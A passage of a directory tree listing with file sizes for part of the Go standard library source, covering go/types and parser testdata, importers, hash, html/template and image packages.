│ │ │ │ ├── [ 299] issue13742.0.golden
│ │ │ │ ├── [ 299] issue13742.1.golden
│ │ │ │ ├── [ 299] issue13742.2.golden
│ │ │ │ ├── [ 411] issue13742.go
│ │ │ │ ├── [ 277] issue16153.0.golden
│ │ │ │ ├── [ 306] issue16153.1.golden
│ │ │ │ ├── [ 277] issue16153.2.golden
│ │ │ │ ├── [ 363] issue16153.go
│ │ │ │ ├── [ 91] issue17788.0.golden
│ │ │ │ ├── [ 91] issue17788.1.golden
│ │ │ │ ├── [ 91] issue17788.2.golden
│ │ │ │ ├── [ 218] issue17788.go
│ │ │ │ ├── [ 654] issue22856.0.golden
│ │ │ │ ├── [ 654] issue22856.1.golden
│ │ │ │ ├── [ 654] issue22856.2.golden
│ │ │ │ ├── [1.1K] issue22856.go
│ │ │ │ ├── [4.0K] pkgdoc
│ │ │ │ │ └── [ 301] doc.go
│ │ │ │ ├── [ 159] predeclared.0.golden
│ │ │ │ ├── [ 330] predeclared.1.golden
│ │ │ │ ├── [ 159] predeclared.2.golden
│ │ │ │ ├── [ 489] predeclared.go
│ │ │ │ ├── [1.1K] template.txt
│ │ │ │ ├── [4.1K] testing.0.golden
│ │ │ │ ├── [8.4K] testing.1.golden
│ │ │ │ ├── [4.1K] testing.2.golden
│ │ │ │ └── [ 12K] testing.go
│ │ │ ├── [4.0K] format
│ │ │ │ ├── [4.3K] format.go
│ │ │ │ └── [5.0K] internal.go
│ │ │ ├── [4.0K] importer
│ │ │ │ └── [3.6K] importer.go
│ │ │ ├── [4.0K] internal
│ │ │ │ ├── [4.0K] gccgoimporter
│ │ │ │ │ ├── [4.4K] ar.go
│ │ │ │ │ ├── [2.4K] gccgoinstallation.go
│ │ │ │ │ ├── [6.8K] importer.go
│ │ │ │ │ ├── [ 31K] parser.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [ 624] aliases.go
│ │ │ │ │ ├── [1.4K] aliases.gox
│ │ │ │ │ ├── [ 95] complexnums.go
│ │ │ │ │ ├── [ 164] complexnums.gox
│ │ │ │ │ ├── [ 67] conversions.go
│ │ │ │ │ ├── [ 170] conversions.gox
│ │ │ │ │ ├── [ 306] escapeinfo.go
│ │ │ │ │ ├── [ 350] escapeinfo.gox
│ │ │ │ │ ├── [ 71] imports.go
│ │ │ │ │ ├── [ 320] imports.gox
│ │ │ │ │ ├── [ 71] issue27856.go
│ │ │ │ │ ├── [ 293] issue27856.gox
│ │ │ │ │ ├── [ 693] issue29198.go
│ │ │ │ │ ├── [6.4K] issue29198.gox
│ │ │ │ │ ├── [ 211] issue30628.go
│ │ │ │ │ ├── [1.4K] issue30628.gox
│ │ │ │ │ ├── [ 332] issue31540.go
│ │ │ │ │ ├── [ 454] issue31540.gox
│ │ │ │ │ ├── [ 257] issue34182.go
│ │ │ │ │ ├── [ 354] issue34182.gox
│ │ │ │ │ ├── [ 289] nointerface.go
│ │ │ │ │ ├── [ 211] nointerface.gox
│ │ │ │ │ ├── [ 50] notinheap.go
│ │ │ │ │ ├── [ 130] notinheap.gox
│ │ │ │ │ ├── [ 36] pointer.go
│ │ │ │ │ ├── [ 83] pointer.gox
│ │ │ │ │ ├── [7.3K] time.gox
│ │ │ │ │ ├── [7.3K] unicode.gox
│ │ │ │ │ └── [ 10K] v1reflect.gox
│ │ │ │ ├── [4.0K] gcimporter
│ │ │ │ │ ├── [2.4K] exportdata.go
│ │ │ │ │ ├── [4.8K] gcimporter.go
│ │ │ │ │ ├── [ 19K] iimport.go
│ │ │ │ │ ├── [3.6K] support.go
│ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ ├── [ 273] a.go
│ │ │ │ │ │ ├── [ 225] b.go
│ │ │ │ │ │ ├── [1.5K] exports.go
│ │ │ │ │ │ ├── [ 572] generics.go
│ │ │ │ │ │ ├── [ 340] issue15920.go
│ │ │ │ │ │ ├── [ 196] issue20046.go
│ │ │ │ │ │ ├── [ 280] issue25301.go
│ │ │ │ │ │ ├── [ 233] issue25596.go
│ │ │ │ │ │ ├── [ 236] p.go
│ │ │ │ │ │ └── [4.0K] versions
│ │ │ │ │ │ └── [ 918] test.go
│ │ │ │ │ └── [ 14K] ureader.go
│ │ │ │ ├── [4.0K] srcimporter
│ │ │ │ │ ├── [8.0K] srcimporter.go
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [4.0K] issue20855
│ │ │ │ │ │ └── [ 235] issue20855.go
│ │ │ │ │ ├── [4.0K] issue23092
│ │ │ │ │ │ └── [ 179] issue23092.go
│ │ │ │ │ └── [4.0K] issue24392
│ │ │ │ │ └── [ 179] issue24392.go
│ │ │ │ └── [4.0K] typeparams
│ │ │ │ ├── [ 586] common.go
│ │ │ │ └── [1.2K] typeparams.go
│ │ │ ├── [4.0K] parser
│ │ │ │ ├── [7.2K] interface.go
│ │ │ │ ├── [ 71K] parser.go
│ │ │ │ ├── [ 16K] resolver.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [1.7K] chans.go2
│ │ │ │ ├── [ 365] commas.src
│ │ │ │ ├── [1.1K] interface.go2
│ │ │ │ ├── [ 535] issue11377.src
│ │ │ │ ├── [ 546] issue23434.src
│ │ │ │ ├── [ 822] issue3106.src
│ │ │ │ ├── [ 601] issue34946.src
│ │ │ │ ├── [4.0K] issue42951
│ │ │ │ │ └── [4.0K] not_a_file.go
│ │ │ │ │ └── [ 44] invalid.go
│ │ │ │ ├── [ 403] issue44504.src
│ │ │ │ ├── [ 225] issue49174.go2
│ │ │ │ ├── [ 307] issue49175.go2
│ │ │ │ ├── [1.1K] issue49482.go2
│ │ │ │ ├── [ 533] issue50427.go2
│ │ │ │ ├── [2.0K] linalg.go2
│ │ │ │ ├── [2.6K] map.go2
│ │ │ │ ├── [ 908] metrics.go2
│ │ │ │ ├── [4.0K] resolution
│ │ │ │ │ ├── [ 556] issue45136.src
│ │ │ │ │ ├── [ 645] issue45160.src
│ │ │ │ │ ├── [1.5K] resolution.src
│ │ │ │ │ └── [1.6K] typeparams.go2
│ │ │ │ ├── [ 474] set.go2
│ │ │ │ ├── [ 666] slices.go2
│ │ │ │ ├── [ 902] sort.go2
│ │ │ │ ├── [ 516] typeparams.src
│ │ │ │ └── [2.6K] typeset.go2
│ │ │ ├── [4.0K] printer
│ │ │ │ ├── [3.5K] comment.go
│ │ │ │ ├── [4.6K] gobuild.go
│ │ │ │ ├── [ 51K] nodes.go
│ │ │ │ ├── [ 40K] printer.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.1K] alignment.golden
│ │ │ │ ├── [4.9K] alignment.input
│ │ │ │ ├── [2.2K] comments2.golden
│ │ │ │ ├── [2.3K] comments2.input
│ │ │ │ ├── [ 11K] comments.golden
│ │ │ │ ├── [ 11K] comments.input
│ │ │ │ ├── [1.2K] comments.x
│ │ │ │ ├── [ 912] complit.input
│ │ │ │ ├── [1.1K] complit.x
│ │ │ │ ├── [ 16K] declarations.golden
│ │ │ │ ├── [ 16K] declarations.input
│ │ │ │ ├── [ 160] doc.golden
│ │ │ │ ├── [ 159] doc.input
│ │ │ │ ├── [ 94] empty.golden
│ │ │ │ ├── [ 94] empty.input
│ │ │ │ ├── [ 12K] expressions.golden
│ │ │ │ ├── [ 12K] expressions.input
│ │ │ │ ├── [ 12K] expressions.raw
│ │ │ │ ├── [1.9K] generics.golden
│ │ │ │ ├── [1.9K] generics.input
│ │ │ │ ├── [2.0K] go2numbers.golden
│ │ │ │ ├── [2.0K] go2numbers.input
│ │ │ │ ├── [1.9K] go2numbers.norm
│ │ │ │ ├── [ 46] gobuild1.golden
│ │ │ │ ├── [ 47] gobuild1.input
│ │ │ │ ├── [ 64] gobuild2.golden
│ │ │ │ ├── [ 65] gobuild2.input
│ │ │ │ ├── [ 88] gobuild3.golden
│ │ │ │ ├── [ 89] gobuild3.input
│ │ │ │ ├── [ 77] gobuild4.golden
│ │ │ │ ├── [ 52] gobuild4.input
│ │ │ │ ├── [ 55] gobuild5.golden
│ │ │ │ ├── [ 62] gobuild5.input
│ │ │ │ ├── [ 56] gobuild6.golden
│ │ │ │ ├── [ 55] gobuild6.input
│ │ │ │ ├── [ 369] gobuild7.golden
│ │ │ │ ├── [ 369] gobuild7.input
│ │ │ │ ├── [5.1K] linebreaks.golden
│ │ │ │ ├── [5.1K] linebreaks.input
│ │ │ │ ├── [ 51K] parser.go
│ │ │ │ ├── [2.0K] slow.golden
│ │ │ │ ├── [1.9K] slow.input
│ │ │ │ ├── [8.0K] statements.golden
│ │ │ │ └── [8.3K] statements.input
│ │ │ ├── [4.0K] scanner
│ │ │ │ ├── [3.0K] errors.go
│ │ │ │ └── [ 24K] scanner.go
│ │ │ ├── [4.0K] token
│ │ │ │ ├── [ 17K] position.go
│ │ │ │ ├── [1.4K] serialize.go
│ │ │ │ └── [6.4K] token.go
│ │ │ └── [4.0K] types
│ │ │ ├── [ 17K] api.go
│ │ │ ├── [ 802] array.go
│ │ │ ├── [ 13K] assignments.go
│ │ │ ├── [1.5K] basic.go
│ │ │ ├── [ 24K] builtins.go
│ │ │ ├── [ 22K] call.go
│ │ │ ├── [ 909] chan.go
│ │ │ ├── [ 17K] check.go
│ │ │ ├── [4.3K] context.go
│ │ │ ├── [8.2K] conversions.go
│ │ │ ├── [ 28K] decl.go
│ │ │ ├── [ 32K] errorcodes.go
│ │ │ ├── [7.9K] errors.go
│ │ │ ├── [3.1K] eval.go
│ │ │ ├── [ 51K] expr.go
│ │ │ ├── [4.8K] exprstring.go
│ │ │ ├── [1016] gccgosizes.go
│ │ │ ├── [8.3K] gotype.go
│ │ │ ├── [ 11K] index.go
│ │ │ ├── [ 25K] infer.go
│ │ │ ├── [9.5K] initorder.go
│ │ │ ├── [8.8K] instantiate.go
│ │ │ ├── [8.1K] interface.go
│ │ │ ├── [7.2K] labels.go
│ │ │ ├── [ 17K] lookup.go
│ │ │ ├── [ 658] map.go
│ │ │ ├── [2.3K] methodlist.go
│ │ │ ├── [6.9K] methodset.go
│ │ │ ├── [9.0K] mono.go
│ │ │ ├── [ 14K] named.go
│ │ │ ├── [ 17K] object.go
│ │ │ ├── [ 927] objset.go
│ │ │ ├── [ 10K] operand.go
│ │ │ ├── [2.4K] package.go
│ │ │ ├── [ 634] pointer.go
│ │ │ ├── [ 14K] predicates.go
│ │ │ ├── [ 24K] resolver.go
│ │ │ ├── [4.2K] return.go
│ │ │ ├── [9.3K] scope.go
│ │ │ ├── [4.0K] selection.go
│ │ │ ├── [ 12K] signature.go
│ │ │ ├── [6.9K] sizes.go
│ │ │ ├── [ 576] slice.go
│ │ │ ├── [ 26K] stmt.go
│ │ │ ├── [6.0K] struct.go
│ │ │ ├── [ 11K] subst.go
│ │ │ ├── [3.7K] termlist.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [4.0K] check
│ │ │ │ │ ├── [ 203] blank.go
│ │ │ │ │ ├── [ 24K] builtins0.go
│ │ │ │ │ ├── [5.5K] builtins1.go
│ │ │ │ │ ├── [1.7K] chans.go
│ │ │ │ │ ├── [ 442] compliterals.go
│ │ │ │ │ ├── [9.2K] const0.go
│ │ │ │ │ ├── [8.6K] const1.go
│ │ │ │ │ ├── [3.7K] constdecl.go
│ │ │ │ │ ├── [1.7K] conversions0.go
│ │ │ │ │ ├── [5.1K] conversions1.go
│ │ │ │ │ ├── [2.9K] cycles0.go
│ │ │ │ │ ├── [ 781] cycles1.go
│ │ │ │ │ ├── [1.1K] cycles2.go
│ │ │ │ │ ├── [ 675] cycles3.go
│ │ │ │ │ ├── [2.0K] cycles4.go
│ │ │ │ │ ├── [3.0K] cycles5.go
│ │ │ │ │ ├── [4.1K] decls0.go
│ │ │ │ │ ├── [3.8K] decls1.go
│ │ │ │ │ ├── [4.0K] decls2
│ │ │ │ │ │ ├── [3.2K] decls2a.go
│ │ │ │ │ │ └── [1.9K] decls2b.go
│ │ │ │ │ ├── [4.3K] decls3.go
│ │ │ │ │ ├── [3.1K] decls4.go
│ │ │ │ │ ├── [ 363] decls5.go
│ │ │ │ │ ├── [2.2K] errors.go
│ │ │ │ │ ├── [3.4K] expr0.go
│ │ │ │ │ ├── [2.6K] expr1.go
│ │ │ │ │ ├── [4.9K] expr2.go
│ │ │ │ │ ├── [ 15K] expr3.go
│ │ │ │ │ ├── [2.1K] funcinference.go
│ │ │ │ │ ├── [1.1K] go1_12.go
│ │ │ │ │ ├── [ 403] go1_13.go
│ │ │ │ │ ├── [ 343] go1_16.go
│ │ │ │ │ ├── [ 334] go1_8.go
│ │ │ │ │ ├── [5.8K] gotos.go
│ │ │ │ │ ├── [1.2K] importC.go
│ │ │ │ │ ├── [4.0K] importdecl0
│ │ │ │ │ │ ├── [1.2K] importdecl0a.go
│ │ │ │ │ │ └── [1007] importdecl0b.go
│ │ │ │ │ ├── [4.0K] importdecl1
│ │ │ │ │ │ ├── [ 521] importdecl1a.go
│ │ │ │ │ │ └── [ 267] importdecl1b.go
│ │ │ │ │ ├── [1.9K] init0.go
│ │ │ │ │ ├── [1.5K] init1.go
│ │ │ │ │ ├── [3.5K] init2.go
│ │ │ │ │ ├── [4.0K] issue25008
│ │ │ │ │ │ ├── [ 260] issue25008a.go
│ │ │ │ │ │ └── [ 198] issue25008b.go
│ │ │ │ │ ├── [ 11K] issues0.go
│ │ │ │ │ ├── [6.0K] issues1.go
│ │ │ │ │ ├── [3.2K] labels.go
│ │ │ │ │ ├── [2.2K] linalg.go
│ │ │ │ │ ├── [2.4K] literals.go
│ │ │ │ │ ├── [ 361] main0.go
│ │ │ │ │ ├── [ 249] main1.go
│ │ │ │ │ ├── [2.8K] map0.go
│ │ │ │ │ ├── [3.4K] map1.go
│ │ │ │ │ ├── [3.4K] methodsets.go
│ │ │ │ │ ├── [ 13K] shifts.go
│ │ │ │ │ ├── [1.5K] slices.go
│ │ │ │ │ ├── [ 19K] stmt0.go
│ │ │ │ │ ├── [3.3K] stmt1.go
│ │ │ │ │ ├── [ 642] todos.go
│ │ │ │ │ ├── [1.4K] typeinference.go
│ │ │ │ │ ├── [1.7K] typeinst0.go
│ │ │ │ │ ├── [5.7K] typeinst1.go
│ │ │ │ │ ├── [ 384] typeinstcycles.go
│ │ │ │ │ ├── [ 15K] typeparams.go
│ │ │ │ │ ├── [2.2K] unions.go
│ │ │ │ │ └── [5.3K] vardecl.go
│ │ │ │ ├── [4.0K] examples
│ │ │ │ │ ├── [2.9K] constraints.go
│ │ │ │ │ ├── [5.4K] functions.go
│ │ │ │ │ ├── [3.1K] inference.go
│ │ │ │ │ ├── [5.0K] methods.go
│ │ │ │ │ ├── [ 576] operations.go
│ │ │ │ │ ├── [1.3K] typesets.go
│ │ │ │ │ └── [8.7K] types.go
│ │ │ │ ├── [4.0K] fixedbugs
│ │ │ │ │ ├── [ 412] issue20583.go
│ │ │ │ │ ├── [ 306] issue23203a.go
│ │ │ │ │ ├── [ 306] issue23203b.go
│ │ │ │ │ ├── [ 301] issue25838.go
│ │ │ │ │ ├── [ 290] issue26390.go
│ │ │ │ │ ├── [1.2K] issue28251.go
│ │ │ │ │ ├── [3.3K] issue39634.go
│ │ │ │ │ ├── [ 296] issue39664.go
│ │ │ │ │ ├── [ 533] issue39680.go
│ │ │ │ │ ├── [ 423] issue39693.go
│ │ │ │ │ ├── [ 500] issue39699.go
│ │ │ │ │ ├── [ 501] issue39711.go
│ │ │ │ │ ├── [ 350] issue39723.go
│ │ │ │ │ ├── [ 523] issue39725.go
│ │ │ │ │ ├── [ 579] issue39754.go
│ │ │ │ │ ├── [ 507] issue39755.go
│ │ │ │ │ ├── [ 572] issue39768.go
│ │ │ │ │ ├── [ 915] issue39938.go
│ │ │ │ │ ├── [ 242] issue39948.go
│ │ │ │ │ ├── [ 430] issue39976.go
│ │ │ │ │ ├── [ 539] issue39982.go
│ │ │ │ │ ├── [ 271] issue40038.go
│ │ │ │ │ ├── [ 335] issue40056.go
│ │ │ │ │ ├── [ 328] issue40057.go
│ │ │ │ │ ├── [ 256] issue40301.go
│ │ │ │ │ ├── [ 373] issue40684.go
│ │ │ │ │ ├── [ 614] issue40789.go
│ │ │ │ │ ├── [2.0K] issue41124.go
│ │ │ │ │ ├── [ 533] issue42695.go
│ │ │ │ │ ├── [ 645] issue42758.go
│ │ │ │ │ ├── [ 463] issue42987.go
│ │ │ │ │ ├── [ 524] issue43056.go
│ │ │ │ │ ├── [ 747] issue43087.go
│ │ │ │ │ ├── [ 324] issue43109.go
│ │ │ │ │ ├── [ 785] issue43110.go
│ │ │ │ │ ├── [ 387] issue43124.go
│ │ │ │ │ ├── [ 253] issue43125.go
│ │ │ │ │ ├── [ 550] issue43190.go
│ │ │ │ │ ├── [ 371] issue43527.go
│ │ │ │ │ ├── [1.1K] issue43671.go
│ │ │ │ │ ├── [1.0K] issue44688.go
│ │ │ │ │ ├── [ 530] issue44799.go
│ │ │ │ │ ├── [ 254] issue45114.go
│ │ │ │ │ ├── [ 302] issue45548.go
│ │ │ │ │ ├── [ 303] issue45550.go
│ │ │ │ │ ├── [ 619] issue45635.go
│ │ │ │ │ ├── [ 619] issue45639.go
│ │ │ │ │ ├── [ 590] issue45920.go
│ │ │ │ │ ├── [ 315] issue45985.go
│ │ │ │ │ ├── [ 293] issue46090.go
│ │ │ │ │ ├── [ 451] issue46275.go
│ │ │ │ │ ├── [ 299] issue46403.go
│ │ │ │ │ ├── [ 299] issue46404.go1
│ │ │ │ │ ├── [ 510] issue46461.go
│ │ │ │ │ ├── [ 337] issue47031.go
│ │ │ │ │ ├── [ 830] issue47115.go
│ │ │ │ │ ├── [1.9K] issue47127.go
│ │ │ │ │ ├── [ 988] issue47411.go
│ │ │ │ │ ├── [1.7K] issue47747.go
│ │ │ │ │ ├── [1.1K] issue47796.go
│ │ │ │ │ ├── [2.5K] issue47818.go
│ │ │ │ │ ├── [ 554] issue47887.go
│ │ │ │ │ ├── [ 664] issue47968.go
│ │ │ │ │ ├── [1.4K] issue48008.go
│ │ │ │ │ ├── [ 394] issue48018.go
│ │ │ │ │ ├── [ 356] issue48048.go
│ │ │ │ │ ├── [ 260] issue48082.go
│ │ │ │ │ ├── [ 258] issue48083.go
│ │ │ │ │ ├── [ 912] issue48136.go
│ │ │ │ │ ├── [ 239] issue48234.go
│ │ │ │ │ ├── [ 475] issue48312.go
│ │ │ │ │ ├── [ 436] issue48472.go
│ │ │ │ │ ├── [ 283] issue48529.go
│ │ │ │ │ ├── [ 486] issue48582.go
│ │ │ │ │ ├── [ 571] issue48619.go
│ │ │ │ │ ├── [ 287] issue48656.go
│ │ │ │ │ ├── [ 275] issue48695.go
│ │ │ │ │ ├── [ 767] issue48703.go
│ │ │ │ │ ├── [1.1K] issue48712.go
│ │ │ │ │ ├── [ 340] issue48819.go
│ │ │ │ │ ├── [ 597] issue48827.go
│ │ │ │ │ ├── [ 754] issue48951.go
│ │ │ │ │ ├── [ 258] issue48962.go
│ │ │ │ │ ├── [ 455] issue48974.go
│ │ │ │ │ ├── [ 238] issue49003.go
│ │ │ │ │ ├── [ 710] issue49005.go
│ │ │ │ │ ├── [ 517] issue49043.go
│ │ │ │ │ ├── [ 365] issue49112.go
│ │ │ │ │ ├── [1009] issue49179.go
│ │ │ │ │ ├── [ 752] issue49242.go
│ │ │ │ │ ├── [ 550] issue49247.go
│ │ │ │ │ ├── [ 975] issue49276.go
│ │ │ │ │ ├── [ 589] issue49296.go
│ │ │ │ │ ├── [ 695] issue49439.go
│ │ │ │ │ ├── [1.2K] issue49482.go
│ │ │ │ │ ├── [ 811] issue49541.go
│ │ │ │ │ ├── [ 452] issue49579.go
│ │ │ │ │ ├── [ 235] issue49592.go
│ │ │ │ │ ├── [ 468] issue49602.go
│ │ │ │ │ ├── [ 347] issue49705.go
│ │ │ │ │ ├── [ 439] issue49735.go
│ │ │ │ │ ├── [ 579] issue49739.go
│ │ │ │ │ ├── [ 240] issue49864.go
│ │ │ │ │ ├── [ 347] issue50259.go
│ │ │ │ │ ├── [ 880] issue50276.go
│ │ │ │ │ ├── [ 554] issue50281.go
│ │ │ │ │ ├── [ 248] issue50321.go
│ │ │ │ │ ├── [1.4K] issue50417.go
│ │ │ │ │ ├── [1.1K] issue50426.go
│ │ │ │ │ ├── [ 731] issue50427.go
│ │ │ │ │ ├── [ 219] issue50450.go
│ │ │ │ │ ├── [ 360] issue50516.go
│ │ │ │ │ ├── [ 732] issue50646.go
│ │ │ │ │ ├── [1.0K] issue50755.go
│ │ │ │ │ ├── [ 392] issue50779.go
│ │ │ │ │ ├── [1.7K] issue50782.go
│ │ │ │ │ ├── [ 621] issue50816.go
│ │ │ │ │ ├── [ 369] issue50833.go
│ │ │ │ │ ├── [ 493] issue50912.go
│ │ │ │ │ ├── [ 453] issue50918.go
│ │ │ │ │ ├── [1.4K] issue50929.go
│ │ │ │ │ ├── [ 431] issue50965.go
│ │ │ │ │ ├── [ 221] issue51048.go
│ │ │ │ │ ├── [ 439] issue51145.go
│ │ │ │ │ ├── [ 463] issue51158.go
│ │ │ │ │ ├── [4.8K] issue51229.go
│ │ │ │ │ ├── [ 780] issue51232.go
│ │ │ │ │ ├── [ 657] issue51233.go
│ │ │ │ │ ├── [ 903] issue51257.go
│ │ │ │ │ ├── [ 414] issue51335.go
│ │ │ │ │ ├── [ 720] issue51339.go
│ │ │ │ │ ├── [ 413] issue51360.go
│ │ │ │ │ ├── [ 658] issue51376.go
│ │ │ │ │ ├── [ 318] issue51386.go
│ │ │ │ │ ├── [ 373] issue51437.go
│ │ │ │ │ ├── [1.4K] issue51472.go
│ │ │ │ │ ├── [ 208] issue51509.go
│ │ │ │ │ ├── [ 390] issue51533.go
│ │ │ │ │ ├── [ 425] issue51578.go
│ │ │ │ │ ├── [ 327] issue51593.go
│ │ │ │ │ ├── [2.0K] issue51607.go
│ │ │ │ │ ├── [ 497] issue51616.go
│ │ │ │ │ ├── [ 793] issue51658.go
│ │ │ │ │ ├── [ 524] issue51877.go
│ │ │ │ │ ├── [ 732] issue52031.go
│ │ │ │ │ ├── [ 273] issue52401.go
│ │ │ │ │ └── [2.3K] issue6977.go
│ │ │ │ ├── [ 286] manual.go
│ │ │ │ └── [4.0K] spec
│ │ │ │ ├── [5.1K] assignability.go
│ │ │ │ ├── [3.0K] comparisons.go
│ │ │ │ └── [7.2K] conversions.go
│ │ │ ├── [ 928] tuple.go
│ │ │ ├── [2.9K] type.go
│ │ │ ├── [1.8K] typelists.go
│ │ │ ├── [4.7K] typeparam.go
│ │ │ ├── [ 14K] typeset.go
│ │ │ ├── [ 11K] typestring.go
│ │ │ ├── [3.5K] typeterm.go
│ │ │ ├── [ 16K] typexpr.go
│ │ │ ├── [ 18K] unify.go
│ │ │ ├── [6.2K] union.go
│ │ │ ├── [7.7K] universe.go
│ │ │ ├── [4.4K] validtype.go
│ │ │ └── [2.2K] version.go
│ │ ├── [ 288] go.mod
│ │ ├── [3.6K] go.sum
│ │ ├── [4.0K] hash
│ │ │ ├── [4.0K] adler32
│ │ │ │ └── [3.2K] adler32.go
│ │ │ ├── [4.0K] crc32
│ │ │ │ ├── [6.8K] crc32_amd64.go
│ │ │ │ ├── [5.4K] crc32_amd64.s
│ │ │ │ ├── [1.2K] crc32_arm64.go
│ │ │ │ ├── [1.5K] crc32_arm64.s
│ │ │ │ ├── [2.5K] crc32_generic.go
│ │ │ │ ├── [7.9K] crc32.go
│ │ │ │ ├── [ 681] crc32_otherarch.go
│ │ │ │ ├── [2.2K] crc32_ppc64le.go
│ │ │ │ ├── [ 14K] crc32_ppc64le.s
│ │ │ │ ├── [2.1K] crc32_s390x.go
│ │ │ │ ├── [7.6K] crc32_s390x.s
│ │ │ │ ├── [113K] crc32_table_ppc64le.s
│ │ │ │ └── [4.5K] gen_const_ppc64le.go
│ │ │ ├── [4.0K] crc64
│ │ │ │ └── [5.6K] crc64.go
│ │ │ ├── [4.0K] fnv
│ │ │ │ └── [9.6K] fnv.go
│ │ │ ├── [2.1K] hash.go
│ │ │ ├── [4.0K] maphash
│ │ │ │ └── [9.0K] maphash.go
│ │ │ ├── [1.3K] test_cases.txt
│ │ │ └── [ 450] test_gen.awk
│ │ ├── [4.0K] html
│ │ │ ├── [114K] entity.go
│ │ │ ├── [5.0K] escape.go
│ │ │ ├── [ 644] fuzz.go
│ │ │ └── [4.0K] template
│ │ │ ├── [6.2K] attr.go
│ │ │ ├── [ 413] attr_string.go
│ │ │ ├── [6.2K] content.go
│ │ │ ├── [8.3K] context.go
│ │ │ ├── [7.0K] css.go
│ │ │ ├── [ 416] delim_string.go
│ │ │ ├── [7.6K] doc.go
│ │ │ ├── [ 445] element_string.go
│ │ │ ├── [8.9K] error.go
│ │ │ ├── [ 31K] escape.go
│ │ │ ├── [7.3K] html.go
│ │ │ ├── [ 387] jsctx_string.go
│ │ │ ├── [ 12K] js.go
│ │ │ ├── [ 755] state_string.go
│ │ │ ├── [ 17K] template.go
│ │ │ ├── [4.0K] testdata
│ │ │ │ ├── [ 57] file1.tmpl
│ │ │ │ ├── [ 76] file2.tmpl
│ │ │ │ ├── [ 406] fs.zip
│ │ │ │ ├── [ 50] tmpl1.tmpl
│ │ │ │ └── [ 50] tmpl2.tmpl
│ │ │ ├── [ 15K] transition.go
│ │ │ ├── [6.6K] url.go
│ │ │ └── [ 436] urlpart_string.go
│ │ ├── [4.0K] image
│ │ │ ├── [4.0K] color
│ │ │ │ ├── [8.2K] color.go
│ │ │ │ ├── [4.0K] palette
│ │ │ │ │ ├── [ 277] generate.go
│ │ │ │ │ ├── [3.5K] gen.go
│ │ │ │ │ └── [ 18K] palette.go
│ │ │ │ └── [ 11K] ycbcr.go
│ │ │ ├── [4.0K] draw
│ │ │ │ └── [ 34K] draw.go
│ │ │ ├── [3.0K] format.go
│ │ │ ├── [7.3K] geom.go
│ │ │ ├── [4.0K] gif
│ │ │ │ ├── [ 17K] reader.go
│ │ │ │ └── [ 12K] writer.go
│ │ │ ├── [ 34K] image.go
│ │ │ ├── [4.0K] internal
│ │ │ │ └── [4.0K] imageutil
│ │ │ │ ├── [4.3K] gen.go
│ │ │ │ ├── [ 276] imageutil.go
│ │ │ │ └── [7.4K] impl.go
│ │ │ ├── [4.0K] jpeg
│ │ │ │ ├── [6.0K] fdct.go
│ │ │ │ ├── [6.3K] huffman.go
│ │ │ │ ├── [5.0K] idct.go
│ │ │ │ ├── [ 23K] reader.go
│ │ │ │ ├── [ 15K] scan.go
│ │ │ │ └── [ 17K] writer.go
│ │ │ ├── [1.5K] names.go
│ │ │ ├── [4.0K] png
│ │ │ │ ├── [ 958] fuzz.go
│ │ │ │ ├── [1.7K] paeth.go
│ │ │ │ ├── [ 26K] reader.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 14K] benchGray.png
│ │ │ │ │ ├── [ 57K] benchNRGBA-gradient.png
│ │ │ │ │ ├── [ 43K] benchNRGBA-opaque.png
│ │ │ │ │ ├── [ 13K] benchPaletted.png
│ │ │ │ │ ├── [ 46K] benchRGB-interlace.png
│ │ │ │ │ ├── [ 39K] benchRGB.png
│ │ │ │ │ ├── [ 247] gray-gradient.interlaced.png
│ │ │ │ │ ├── [ 77] gray-gradient.png
│ │ │ │ │ ├── [1.3K] invalid-crc32.png
│ │ │ │ │ ├── [1.2K] invalid-noend.png
│ │ │ │ │ ├── [1.1K] invalid-palette.png
│ │ │ │ │ ├── [1.3K] invalid-trunc.png
│ │ │ │ │ ├── [1.3K] invalid-zlib.png
│ │ │ │ │ └── [4.0K] pngsuite
│ │ │ │ │ ├── [ 162] basn0g01-30.png
│ │ │ │ │ ├── [1.9K] basn0g01-30.sng
│ │ │ │ │ ├── [ 164] basn0g01.png
│ │ │ │ │ ├── [2.2K] basn0g01.sng
│ │ │ │ │ ├── [ 110] basn0g02-29.png
│ │ │ │ │ ├── [1.8K] basn0g02-29.sng
│ │ │ │ │ ├── [ 104] basn0g02.png
│ │ │ │ │ ├── [2.2K] basn0g02.sng
│ │ │ │ │ ├── [ 153] basn0g04-31.png
│ │ │ │ │ ├── [2.0K] basn0g04-31.sng
│ │ │ │ │ ├── [ 145] basn0g04.png
│ │ │ │ │ ├── [2.2K] basn0g04.sng
│ │ │ │ │ ├── [ 138] basn0g08.png
│ │ │ │ │ ├── [2.2K] basn0g08.sng
│ │ │ │ │ ├── [ 167] basn0g16.png
│ │ │ │ │ ├── [5.2K] basn0g16.sng
│ │ │ │ │ ├── [ 145] basn2c08.png
│ │ │ │ │ ├── [7.2K] basn2c08.sng
│ │ │ │ │ ├── [ 302] basn2c16.png
│ │ │ │ │ ├── [ 13K] basn2c16.sng
│ │ │ │ │ ├── [ 112] basn3p01.png
│ │ │ │ │ ├── [ 528] basn3p01.sng
│ │ │ │ │ ├── [ 146] basn3p02.png
│ │ │ │ │ ├── [ 878] basn3p02.sng
│ │ │ │ │ ├── [ 358] basn3p04-31i.png
│ │ │ │ │ ├── [1.8K] basn3p04-31i.sng
│ │ │ │ │ ├── [ 216] basn3p04.png
│ │ │ │ │ ├── [1.9K] basn3p04.sng
│ │ │ │ │ ├── [1.3K] basn3p08.png
│ │ │ │ │ ├── [ 14K] basn3p08.sng
│ │ │ │ │ ├── [1.5K] basn3p08-trns.png
│ │ │ │ │ ├── [ 15K] basn3p08-trns.sng
│ │ │ │ │ ├── [ 126] basn4a08.png
│ │ │ │ │ ├── [9.2K] basn4a08.sng
│ │ │ │ │ ├── [2.2K] basn4a16.png
│ │ │ │ │ ├── [9.2K] basn4a16.sng
│ │ │ │ │ ├── [ 184] basn6a08.png
│ │ │ │ │ ├── [9.2K] basn6a08.sng
│ │ │ │ │ ├── [3.4K] basn6a16.png
│ │ │ │ │ ├── [ 17K] basn6a16.sng
